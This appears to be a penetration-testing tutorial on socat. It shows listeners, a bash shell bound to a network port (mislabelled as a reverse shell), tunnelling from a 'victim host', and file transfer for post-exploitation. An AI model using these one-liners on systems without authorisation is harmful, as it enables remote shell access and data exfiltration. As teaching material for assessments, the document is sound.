Socat is a network swiss army knife utility and it is very similar to Netcat. However, Socat has many additional features that makes it a better alternative to Netcat. Socat also has advanced features such as listeners for multiple clients, different protocols, reusing connections, connection redirection etc. The following are some few examples of how to use Socat and how it can be a very useful tool during assessments.

Socat Listener

The following command tells Socat to use the TCP protocol and listen on port 123 and print any given information from a client to the terminal(STDOUT). The TCP value can be changed and specific versions can be used such as TCP4, TCP6, TCP4-LISTEN, and TCP6-LISTEN. The TCP value can also be changed to emulate a UDP listener.

socat TCP4-LISTEN:123 STDOUT

To connect to this server, the following command can be issued.

socat TCP:192.168.1.81:123 -
> hello

This will send the world hello to the socat listener listening on port 123.

Something similar to the following can also be issued to take something from STDIN and send that to a listener.

whoami | socat STDIN TCP:192.168.1.81:123

A useful example of this would be the below where a UDP packet can be created from STDIN and send to a host using socat.

echo “UDP packet” | Socat STDIO UDP4-DATAGRAM:192.168.2.1:123

Reverse Shell

The below one liner is an example of binding the bash shell to a port and connecting to it.

root@kali:~/test# socat TCP-LISTEN:1337 EXEC:/bin/bash

Socat web server

To start a web server with Socat, the following command can be issued. The -v option tells Socat to be verbose and the -T option can be used to set timeouts.

socat -v -T0.05 tcp-l:80,reuseaddr,fork system:"echo 'HTTP/1.1 200 OK'; echo 'Connection: close'; echo; cat"

HTTPS server

Socat can also be used to setup HTTPS servers. In the below example, a self-signed certificate is created using Openssl and it is used to setup a HTTPS server.

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365
cat key.pem >> cert.pem 
socat OPENSSL-LISTEN:443,cert=/root/test/cert.pem -

The following command can also be using as an alternative to Openssl client and connect to services using SSL/TLS.

socat - OPENSSL:192.168.1.81:443

Terminal Emulation

In scenarios where commands need to be issued to a network medium without using a terminal emulator, the following command can be useful.

socat READLINE,history:/tmp/serialcommands.txt \
  OPEN:/dev/ttyS0,ispeed=9600,ospeed=9600,crnl,raw,sane,echo=false

Redirecting Traffic

In scenarios where you want to take incoming connections and redirect it to a Linux application, the following command can be used.

socat TCP-LISTEN:443,reuseaddr,fork UNIX-CLIENT:/tmp/foo

You can also specify the bind address and specify what IP ranges can connect to this listener. The su=nobody value will ensure that forked processes will run as the nobody low-privileged user

socat TCP-LISTEN:443,bind=127.0.0.1,reuseaddr,fork,su=nobody,range=127.0.0.0/8 UNIX-CLIENT:/tmp/foo

Tunnelling

Socat can also be a good alternative to SSH when looking for a way to tunnel traffic. The following command can be used on a victim host to capture incoming traffic from port 1022 and send it to 192.168.1.70:22

socat TCP4-LISTEN:1022,reuseaddr,fork TCP4:192.168.1.70:22

File transfer

File transfers can also be conducted with ease using Socat.

socat FILE:data.txt TCP:192.168.1.81:1337
socat TCP-LISTEN:1337 OPEN:data.txt,creat,trunc

However, since Socat isn’t available by default on most systems, Netcat is a better/easier option during post exploitation phases. The static compiled binary version for Socat can be found here if installation in not possible: https://github.com/andrew-d/static-binaries